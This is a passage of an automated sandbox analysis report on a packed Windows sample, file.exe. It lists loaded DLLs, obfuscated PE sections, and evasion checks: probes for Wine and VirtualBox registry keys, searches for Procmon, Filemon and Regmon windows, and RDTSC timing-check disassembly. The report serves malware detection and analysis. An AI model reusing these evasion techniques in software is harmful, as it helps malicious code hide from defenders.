              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_007F3A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007ECAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_007ECAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9CM3DEM8.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1771008 > 1048576
              Source: file.exeStatic PE information: Raw size of smwmjzky is bigger than: 0x100000 < 0x196600

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.7d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;smwmjzky:EW;galsdkjy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;smwmjzky:EW;galsdkjy:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007F6390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1b8bc4 should be: 0x1b79e2
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: smwmjzky
              Source: file.exeStatic PE information: section name: galsdkjy
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C530DF push ebx; mov dword ptr [esp], esi0_2_00C53101
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C180E5 push 163386C3h; mov dword ptr [esp], ebx0_2_00C18100
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2A889 push edx; mov dword ptr [esp], eax0_2_00C2A8E7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2A889 push 77AFB84Bh; mov dword ptr [esp], edi0_2_00C2A91D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2A889 push eax; mov dword ptr [esp], 4AAF8F00h0_2_00C2A9B2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2B04E push 3E55FA47h; mov dword ptr [esp], edx0_2_00C2B092
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C1284C push ebp; mov dword ptr [esp], ebx0_2_00C12893
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C1284C push edi; mov dword ptr [esp], 70C9D589h0_2_00C128A5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3085B push 2757F547h; mov dword ptr [esp], ecx0_2_00C30889
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push eax; mov dword ptr [esp], esi0_2_00B93828
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push 053795FFh; mov dword ptr [esp], esi0_2_00B9383E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push 7D5E545Fh; mov dword ptr [esp], edx0_2_00B93846
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push 3FD02B49h; mov dword ptr [esp], esp0_2_00B938C5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push 333B07A6h; mov dword ptr [esp], edx0_2_00B938CE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push edx; mov dword ptr [esp], edi0_2_00B93965
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push 2B0A921Ah; mov dword ptr [esp], ebx0_2_00B9396D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push 41D38F0Eh; mov dword ptr [esp], ecx0_2_00B93980
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push esi; mov dword ptr [esp], 55657D85h0_2_00B939E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push 09CD2A55h; mov dword ptr [esp], ebx0_2_00B93AAD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push eax; mov dword ptr [esp], esi0_2_00B93B1C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push ebp; mov dword ptr [esp], ebx0_2_00B93B5C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push 7DBB65B2h; mov dword ptr [esp], ecx0_2_00B93B7A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push esi; mov dword ptr [esp], 7FEB6B9Ah0_2_00B93B9C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push 302DF339h; mov dword ptr [esp], esi0_2_00B93BE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push ebp; mov dword ptr [esp], 75FB3ADCh0_2_00B93BE4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push ebx; mov dword ptr [esp], ecx0_2_00B93CE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push ecx; mov dword ptr [esp], 71A41B68h0_2_00B93D43
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push 5C1FACF0h; mov dword ptr [esp], eax0_2_00B93E4B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push ebx; mov dword ptr [esp], 58EB6125h0_2_00B93E4F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push eax; mov dword ptr [esp], edi0_2_00B93E66
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B93824 push 2E261AEEh; mov dword ptr [esp], edi0_2_00B93ECE
              Source: file.exeStatic PE information: section name: smwmjzky entropy: 7.9542409531412455

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007F6390

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-25630
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A201C4 second address: A201D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8934532D0Eh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A201D7 second address: A201DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A201DD second address: A201E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A201E1 second address: A1FAAE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F893453D386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jp 00007F893453D39Dh 0x00000015 jmp 00007F893453D397h 0x0000001a push dword ptr [ebp+122D1091h] 0x00000020 jne 00007F893453D387h 0x00000026 call dword ptr [ebp+122D2BC3h] 0x0000002c pushad 0x0000002d jmp 00007F893453D393h 0x00000032 xor eax, eax 0x00000034 sub dword ptr [ebp+122D19BFh], ecx 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e sub dword ptr [ebp+122D19BFh], esi 0x00000044 mov dword ptr [ebp+122D2904h], eax 0x0000004a add dword ptr [ebp+122D19BFh], edx 0x00000050 mov esi, 0000003Ch 0x00000055 mov dword ptr [ebp+122D19BFh], edx 0x0000005b sub dword ptr [ebp+122D3525h], esi 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 pushad 0x00000066 jne 00007F893453D38Ch 0x0000006c popad 0x0000006d lodsw 0x0000006f mov dword ptr [ebp+122D2045h], eax 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 cld 0x0000007a mov ebx, dword ptr [esp+24h] 0x0000007e sub dword ptr [ebp+122D3525h], ebx 0x00000084 nop 0x00000085 push ecx 0x00000086 jmp 00007F893453D395h 0x0000008b pop ecx 0x0000008c push eax 0x0000008d push eax 0x0000008e push edx 0x0000008f push edx 0x00000090 push eax 0x00000091 push edx 0x00000092 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1FAAE second address: A1FAB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97693 second address: B97699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97699 second address: B9769F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9769F second address: B976A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97C55 second address: B97C7D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8934532D08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F8934532D08h 0x00000014 pushad 0x00000015 jno 00007F8934532D06h 0x0000001b pushad 0x0000001c popad 0x0000001d jl 00007F8934532D06h 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97C7D second address: B97C86 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97C86 second address: B97C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97C8C second address: B97C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97DEC second address: B97DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A475 second address: B9A491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F893453D398h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A491 second address: B9A4B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F8934532D19h 0x00000011 jmp 00007F8934532D13h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A4B5 second address: B9A4E8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e jg 00007F893453D386h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push ecx 0x00000018 jg 00007F893453D386h 0x0000001e pop ecx 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 jno 00007F893453D388h 0x00000029 jc 00007F893453D38Ch 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A4E8 second address: A1FAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jmp 00007F8934532D0Ch 0x0000000e pop eax 0x0000000f mov dword ptr [ebp+122D2045h], esi 0x00000015 push dword ptr [ebp+122D1091h] 0x0000001b xor dh, 00000009h 0x0000001e call dword ptr [ebp+122D2BC3h] 0x00000024 pushad 0x00000025 jmp 00007F8934532D13h 0x0000002a xor eax, eax 0x0000002c sub dword ptr [ebp+122D19BFh], ecx 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 sub dword ptr [ebp+122D19BFh], esi 0x0000003c mov dword ptr [ebp+122D2904h], eax 0x00000042 add dword ptr [ebp+122D19BFh], edx 0x00000048 mov esi, 0000003Ch 0x0000004d mov dword ptr [ebp+122D19BFh], edx 0x00000053 sub dword ptr [ebp+122D3525h], esi 0x00000059 add esi, dword ptr [esp+24h] 0x0000005d pushad 0x0000005e jne 00007F8934532D0Ch 0x00000064 popad 0x00000065 lodsw 0x00000067 mov dword ptr [ebp+122D2045h], eax 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 cld 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 sub dword ptr [ebp+122D3525h], ebx 0x0000007c nop 0x0000007d push ecx 0x0000007e jmp 00007F8934532D15h 0x00000083 pop ecx 0x00000084 push eax 0x00000085 push eax 0x00000086 push edx 0x00000087 push edx 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A524 second address: B9A562 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F893453D395h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e jnp 00007F893453D388h 0x00000014 mov ch, 64h 0x00000016 push 00000000h 0x00000018 xor esi, dword ptr [ebp+122D2854h] 0x0000001e clc 0x0000001f push D1814EECh 0x00000024 push eax 0x00000025 push edx 0x00000026 jne 00007F893453D388h 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A562 second address: B9A5BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 2E7EB194h 0x00000010 mov dword ptr [ebp+122D37DEh], eax 0x00000016 push 00000003h 0x00000018 or esi, 6FF2C100h 0x0000001e push 00000000h 0x00000020 sbb edx, 0CAD763Eh 0x00000026 push 00000003h 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007F8934532D08h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 00000016h 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 mov edi, edx 0x00000044 push 91342199h 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c pushad 0x0000004d popad 0x0000004e pop eax 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A685 second address: B9A689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A689 second address: B9A6B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a adc cx, D4ACh 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D2BF4h], edi 0x00000017 push 29CACF5Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 jc 00007F8934532D06h 0x00000027 popad 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A6B1 second address: B9A768 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F893453D399h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 29CACFDEh 0x00000012 sub dword ptr [ebp+122D2B9Ah], edi 0x00000018 push 00000003h 0x0000001a sub dword ptr [ebp+122D1A93h], esi 0x00000020 push 00000000h 0x00000022 jo 00007F893453D386h 0x00000028 push 00000003h 0x0000002a call 00007F893453D389h 0x0000002f push ebx 0x00000030 jnc 00007F893453D388h 0x00000036 pushad 0x00000037 popad 0x00000038 pop ebx 0x00000039 push eax 0x0000003a jbe 00007F893453D3A4h 0x00000040 mov eax, dword ptr [esp+04h] 0x00000044 jmp 00007F893453D392h 0x00000049 mov eax, dword ptr [eax] 0x0000004b push edx 0x0000004c jmp 00007F893453D38Bh 0x00000051 pop edx 0x00000052 mov dword ptr [esp+04h], eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F893453D396h 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A768 second address: B9A76D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A76D second address: B9A7A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 jmp 00007F893453D391h 0x0000000d lea ebx, dword ptr [ebp+1244E3A8h] 0x00000013 cld 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F893453D398h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A7A8 second address: B9A7CA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F8934532D0Eh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jc 00007F8934532D06h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A7CA second address: B9A7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A959 second address: B9A962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A962 second address: B9A9EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ecx 0x0000000c jp 00007F893453D38Ch 0x00000012 pop ecx 0x00000013 mov eax, dword ptr [eax] 0x00000015 jmp 00007F893453D390h 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 pop eax 0x00000025 jl 00007F893453D38Fh 0x0000002b pushad 0x0000002c add bx, EE47h 0x00000031 mov al, B5h 0x00000033 popad 0x00000034 lea ebx, dword ptr [ebp+1244E3B3h] 0x0000003a mov esi, ebx 0x0000003c jne 00007F893453D39Ah 0x00000042 xchg eax, ebx 0x00000043 jne 00007F893453D39Ah 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jo 00007F893453D38Ch 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A9EF second address: B9A9F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AD03 second address: B8AD3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F893453D395h 0x00000009 pop ebx 0x0000000a jc 00007F893453D3A1h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F893453D399h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AD3E second address: B8AD43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AD43 second address: B8AD6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F893453D386h 0x0000000a jnp 00007F893453D386h 0x00000010 jmp 00007F893453D38Ch 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b js 00007F893453D386h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AD6D second address: B8AD72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9A95 second address: BB9AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F893453D394h 0x0000000e jnp 00007F893453D386h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9C26 second address: BB9C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9F31 second address: BB9F53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D398h 0x00000007 jc 00007F893453D386h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9F53 second address: BB9F5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8934532D06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9F5D second address: BB9F61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA4D8 second address: BBA508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jng 00007F8934532D06h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F8934532D06h 0x00000017 jmp 00007F8934532D19h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA643 second address: BBA647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA647 second address: BBA64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA64D second address: BBA652 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA911 second address: BBA917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA917 second address: BBA91B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA91B second address: BBA923 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA923 second address: BBA93A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F893453D393h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA93A second address: BBA93E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBAA9F second address: BBAAA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBAAA3 second address: BBAAA9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
